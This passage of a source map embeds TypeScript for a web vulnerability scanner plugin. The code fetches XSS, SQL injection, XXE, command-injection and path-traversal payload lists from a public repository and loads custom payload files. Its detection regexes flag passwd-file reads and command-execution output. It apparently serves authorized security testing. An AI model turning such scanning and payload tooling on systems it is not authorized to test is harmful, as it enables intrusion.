PayloadBox.\n \n Accepts both canonical names and short aliases:\n * loadPayloadBox(\"xss\") → fetches XSS payloads\n * loadPayloadBox(\"sqli\") → fetches SQL injection payloads\n /\nexport async function loadPayloadBox(\n name: string,\n limit: number = 50,\n fetchFn: typeof fetch = globalThis.fetch,\n): Promise<RuntimePayload> {\n const type = resolvePayloadType(name);\n\n if (!type) {\n const available = getPayloadBoxTypes().join(\", \");\n const aliases = \"xss, sqli, xxe, cmd, redirect, traversal\";\n throw new Error(\n `Unknown payload type: \"${name}\". Available: ${available}\\nShort aliases: ${aliases}`,\n );\n }\n\n // Check cache\n const cached = cache.get(type);\n if (cached) {\n return cached;\n }\n\n const url = PAYLOADBOX_URLS[type];\n\n try {\n const response = await fetchFn(url);\n if (!response.ok) {\n throw new Error(\n `Failed to fetch: ${response.status} ${response.statusText}`,\n );\n }\n\n const text = await response.text();\n const payloads = text\n .split(\"\\n\")\n .map((line) => line.trim())\n .filter((line) => line && !line.startsWith(\"#\"))\n .slice(0, limit);\n\n if (payloads.length === 0) {\n throw new Error(`No payloads found for ${type}`);\n }\n\n const payload: RuntimePayload = {\n name: type,\n category: CATEGORY_MAP[type],\n description: `${DESCRIPTIONS[type]} (${payloads.length} payloads from PayloadsAllTheThings)`,\n payloads,\n detectPatterns: getDefaultPatterns(type),\n source: \"payloadbox\",\n };\n\n // Cache it\n cache.set(type, payload);\n return payload;\n } catch (err) {\n throw new Error(\n `Failed to fetch payloads for \"${type}\": ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n}\n\n// ── Internal ───────────────────────────────────────────────────────────\n\n/\n Default detection patterns for PayloadBox types\n /\nfunction getDefaultPatterns(type: PayloadBoxType): RegExp[] {\n switch (type) {\n case \"xss\":\n return [\n /<script[^>]>alert\$/i,\n /onerror\\s=\\salert\\(/i,\n /onload\\s=\\salert\\(/i,\n /javascript:alert\\(/i,\n ];\n case \"sql-injection\":\n return [\n /sql.syntax/i,\n /mysql.error/i,\n /ORA-\\d{5}/i,\n /pg_query/i,\n /sqlite.error/i,\n ];\n case \"xxe\":\n return [/root:.:0:0/i, /\\[fonts\\]/i];\n case \"command-injection\":\n return [/uid=\\d+\\([\\w]+\$/i, /root:.:0:0/i];\n case \"open-redirect\":\n return []; // Detected by redirect behavior\n case \"path-traversal\":\n return [/root:.:0:0/i, /\\[fonts\\]/i, /\\[extensions\\]/i];\n default:\n return [];\n }\n}\n\n/*\n Clear PayloadBox cache\n /\nexport function clearPayloadBoxCache(): void {\n cache.clear();\n}\n","/\n File Loader\n * Loads custom payloads from YAML/JSON files\n /\n\nimport { readFile } from \"node:fs/promises\";\nimport { resolve, isAbsolute, extname } from \"node:path\";\nimport YAML from \"yaml\";\nimport { z } from \"zod\";\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/\n Valid payload categories\n /\nconst PAYLOAD_CATEGORIES: PayloadCategory[] = [\n \"xss\",\n \"sqli\",\n \"ssrf\",\n \"xxe\",\n \"command-injection\",\n \"path-traversal\",\n \"open-redirect\",\n \"custom\",\n];\n\n/\n Schema for a single custom payload\n /\nconst CustomPayloadSchema = z.object({\n name: z.string().min(1),\n category: z.enum(\n PAYLOAD_CATEGORIES as [PayloadCategory, ...PayloadCategory[]],\n ),\n description: z.string().optional(),\n payloads: z.array(z.string()).min(1),\n detectPatterns: z.array(z.string()).optional(),\n});\n\n/\n Schema for a payload file (can contain multiple payloads)\n /\nconst PayloadFileSchema = z.object({\n version: z.string().optional(),\n payloads: z.array(CustomPayloadSchema),\n});\n\n/\n Load multiple payload files\n /\nexport async function loadFromFiles(\n filePaths: string[],\n): Promise<RuntimePayload[]> {\n const payloads: RuntimePayload[] = [];\n\n for (const filePath of filePaths) {\n const loaded = await loadFromFile(filePath);\n payloads.push(...loaded);\n }\n\n return payloads;\n}\n\n/\n Load payloads from a single file\n /\nexport async function loadFromFile(\n filePath: string,\n): Promise<RuntimePayload[]> {\n const resolved = isAbsolute(filePath)\n ? filePath\n : resolve(process.cwd(), filePath);\n\n const content = await readFile(resolved, \"utf-8\");\n const ext = extname(resolved).toLowerCase();\n\n // Parse based on extension\n let data: unknown;\n if (ext === \".json\") {\n data = JSON.parse(content);\n } else if (ext === \".yml\" \|\| ext === \".yaml\") {\n data = YAML.parse(content);\n } else {\n throw new Error(\n `Unsupported file extension: ${ext}. Use .yml, .yaml, or .json`,\n );\n }\n\n // Parse and validate\n return parsePayloadData(data);\n}\n\n/\n Parse and validate payload data\n /\nfunction parsePayloadData(data: unknown): RuntimePayload[] {\n const dataObj = data as Record<string, unknown>;\n\n let parsed;\n\n if (Array.isArray(data)) {\n // Array of payload objects\n parsed = { version: \"1\", payloads: data };\n } else if (dataObj?.name && dataObj?.category) {\n // Single payload object (has name and category)\n parsed = { version: \"1\", payloads: [CustomPayloadSchema.parse(data)] };\n } else if (dataObj?.payloads && Array.isArray(dataObj.payloads)) {\n // File schema with payloads array\n parsed = PayloadFileSchema.parse(data);\n } else {\n throw new Error(\n \"Invalid payload file format. Expected: array of payloads, file schema, or single payload object\",\n );\n }\n\n // Convert to RuntimePayload[]\n return parsed.payloads.map(\n (p): RuntimePayload => ({\n name: p.name,\n category: p.category,\n description: p.description \|\| `Custom payload: ${p.name}`,\n payloads: p.payloads,\n detectPatterns: parseDetectPatterns(p.detectPatterns),\n source: \"custom\",\n }),\n );\n}\n\n/\n Parse detect patterns from strings to RegExp\n */\nfunction parseDetectPatterns(patterns?: string[]): RegExp[] {\n if (!patterns \|\| patterns.length === 0) {\n return [];\n }\n\n const regexps: RegExp[] = [];\n for (const pattern of patterns) {\n try {\n regexps.push(new RegExp(pattern, \"i\"));\n } catch {\n console.warn(`Invalid regex pattern: ${pattern}`);\n }\n }\n return regexps;\n}\n"],"mappings":"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","names":["import_zod","YAML"]}